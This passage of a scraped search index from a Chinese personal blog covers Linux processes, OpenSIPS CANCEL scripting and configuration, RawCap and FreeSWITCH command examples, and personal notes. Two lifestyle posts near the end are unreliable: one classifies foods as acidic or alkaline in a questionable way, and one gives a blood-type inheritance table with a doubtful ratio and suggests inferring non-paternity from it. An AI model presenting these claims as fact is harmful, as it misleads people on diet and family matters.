准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后再kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 running 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名 lsof -p 进程号 lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010
/usr/lib64/libc-2.","title":"s"},{"content":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩\n","permalink":"https://wdd.js.org/posts/2020/04/ysx4gz/","summary":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩","title":"老年生活"},{"content":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看得眼花,不知道为什么有那么多人都在简历上写吃苦耐劳,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。\n","permalink":"https://wdd.js.org/posts/2020/04/oczker/","summary":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看得眼花,不知道为什么有那么多人都在简历上写吃苦耐劳,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。","title":"简历之吃苦耐劳"},{"content":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然会产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","permalink":"https://wdd.js.org/opensips/ch7/echo-back/","summary":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然会产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","title":"回音问题调研"},{"content":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了,长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要设置公网 IP。(但是这个只是 1993
年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","permalink":"https://wdd.js.org/opensips/ch1/story-of-nat/","summary":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要设置公网 IP。(但是这个只是 1993 年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","title":"漫话NAT的历史todo"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside from proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? According to RFC 3261,** a CANCEL must be routed to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**. This is required in order to guarantee that the CANCEL will end up (via the same SIP route) in the same place as the INVITE. So, the CANCEL must follow up the INVITE. But how to do and script this?\nIf you run OpenSIPS in a stateless mode, there is no other way than taking care of this at script level – apply the same dialplan and routing decisions for the CANCEL as you did for the INVITE. 
As stateless proxies usually have simple logic, this is not something difficult to do.\nBut what if the routing logic is complex, involving factors that make it hard to reproduce when handling the CANCEL? For example, the INVITE routing may depend on time conditions or dynamic data (that may change at any time).\nIn such cases, you must rely on a stateful routing (SIP transaction based). Basically the transaction engine in OpenSIPS will store and remember the information on where and how the INVITE was routed, so there is no need to “reproduce” that for the CANCEL request – you just fetch it from the transaction context. So, all the heavy lifting is done by the TM (transaction) module – you just have to invoke it:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { t_relay(); exit; } As you can see, there is no need to do any explicit routing for CANCEL requests – you just ask TM module to do it for you – as soon as the module sees you try to route a CANCEL,** it will automatically fetch the needed information from the INVITE transaction and set the proper routing **– all this magic happens inside the t_relay() function.\nNow, OpenSIPS is a multi-process application and INVITE requests may take time to be routed (due to complex logic involving external queries or I/Os like DB, REST or others). So, you may end up with OpenSIPS handling the INVITE request in one process (for some time) while the corresponding CANCEL request starts being handled in another process. This may lead to some race conditions – if the INVITE is not yet processed and routed out, how will OpenSIPS know what to do with the CANCEL??\n多进程模式下的INVITE和CANCEL可能会导致条件竞争\nWell, if you cannot solve a race condition, better avoid it :). How? Postpone the CANCEL processing until the INVITE is done and routed. How? 
If there is no transaction created yet for the INVITE, avoid handling the CANCEL by simply dropping it – no worries, we will not lose the CANCEL as by dropping it, we will force the caller device to resend it over again.\nSo, we enhance our CANCEL scripting by checking for the INVITE transaction – this can be done via the t_check_trans() function. If we do not find the INVITE transaction, simple exit to drop the CANCEL request:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } 如何控制CANCEL请求Reason头? Propagating a correct Reason info in the CANCEL requests is equally important. For example, depending on the Reason for the canceled incoming call, a callee device may report it as a missed call (if the Reason header indicates a caller cancelling) or not (if the Reason header indicates that the call has established somewhere else, due to parallel forking).\nSo, you need to pay attention to propagating or inserting the Reason info into the CANCEL requests!For CANCEL requests built by OpenSIPS , the Reason header is inserted all the time, in order to reflect the reason for generating the CANCEL:\nSIP;cause=480;text=”NO_ANSWER” – if the cancelling was a result of an INVITE timeout; SIP;cause=200;text=”Call completed elsewhere” – if the cancelling was due to parallel forking (another branch of the call was answered); SIP;cause=487;text=”ORIGINATOR_CANCEL” – if the cancelling was received from a previous SIP hop (due an incoming CANCEL). So,** by default, OpenSIPS will discard the Reason info for the CANCEL requests that are received and relayed further** (and force the “ORIGINATOR_CANCEL” reason). But there are many cases when you want to keep and propagate further the incoming Reason header. 
To do that, you need to set the “0x08” flag when calling the t_relay() function for the CANCEL:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) # preserve the received Reason header t_relay(\u0026#34;8\u0026#34;); exit; } If there is no Reason in the incoming CANCEL, the default one will be inserted by OpenSIPS in the outgoing CANCEL.Even more, starting with the 2.3 version, OpenSIPS allows you to inject your own Reason header, by using the t_add_cancel_reason() function:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) { t_add_cancel_reason(\u0026#39;Reason: SIP ;cause=200;text=\u0026#34;Call completed elsewhere\u0026#34;\\r\\n\u0026#39;); t_relay(); } exit; } This function gives you full control over the Reason header and allows various implementation of complex scenarios, especially SBC and front-end like.\n","permalink":"https://wdd.js.org/opensips/blog/cancel-reason/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? 
According to RFC 3261,** a CANCEL must be route to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**.","title":"CANCEL请求和Reason头"},{"content":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0. IP : 169.254.63.243 NIC Name : Local Area Connection NIC Type : Ethernet 1. IP : 192.168.1.129 NIC Name : WiFi NIC Type : Wireless80211 2. IP : 127.0.0.1 NIC Name : Loopback Pseudo-Interface 1 NIC Type : Loopback 3. 
IP : 10.165.240.132 NIC Name : Mobile 12 NIC Type : Wwanpp Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k :::warning 注意:\n执行RawCap.exe的时候,不要用 ./RawCap.exe , 直接用文件名 RawCap.exe 加执行参数 RawCap的功能很弱,没有包过滤。只能指定网卡抓包,然后保存为文件。 ::: 抓指定网卡的包 Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k 参考 https://www.netresec.com/?page=RawCap\n附件 附件中有两个版本的rawcap文件。\nraw-cap.zip ","permalink":"https://wdd.js.org/posts/2020/04/pfkelh/","summary":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0.","title":"window轻量级抓包工具RawCap介绍"},{"content":"\n1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 
发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.wav) # 播放音乐 2.5 呼叫并录音 originate user/1000 \u0026amp;record(/tmp/vocie_of_alice.wav) # 呼叫并录音 2.6 同振与顺振 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.7 经过特定SIP服务器 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.8 忽略early media originate {ignore_early_media=true}user/1000 \u0026amp;echo 2.9 播放假的early media originate {transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.10 立即播放early media originate {instant_ringback=true}{transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.11 设置外显号码 originate {origination_callee_id_name=7777}user/1000 通道变量将影响呼叫的行为。fs的通道变量非常多,就不再一一列举。具体可以参考。下面的链接\nhttps://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables#app-switcher https://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables+Catalog ","permalink":"https://wdd.js.org/freeswitch/fs-cli-example/","summary":"1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 
发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.","title":"fs_cli 例子"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, 
\u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;single-instance-no-db\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. 
if you enable this parameter, be sure to enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). 
route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } # absorb retransmissions, but do not create transaction t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Relay Forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); 
t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/default/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.","title":"默认脚本"},{"content":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。\n","permalink":"https://wdd.js.org/posts/2020/04/pgwzdz/","summary":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。","title":"大数据时代的平民新装"},{"content":" 之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。\n","permalink":"https://wdd.js.org/posts/2020/04/vhovyr/","summary":"之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 
虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。","title":"孩子血型一定和父母血型相同吗?"},{"content":"大多数人可能用下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:含有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铁的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","permalink":"https://wdd.js.org/posts/2020/04/ly7nlv/","summary":"大多数人可能用下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:含有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铁的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 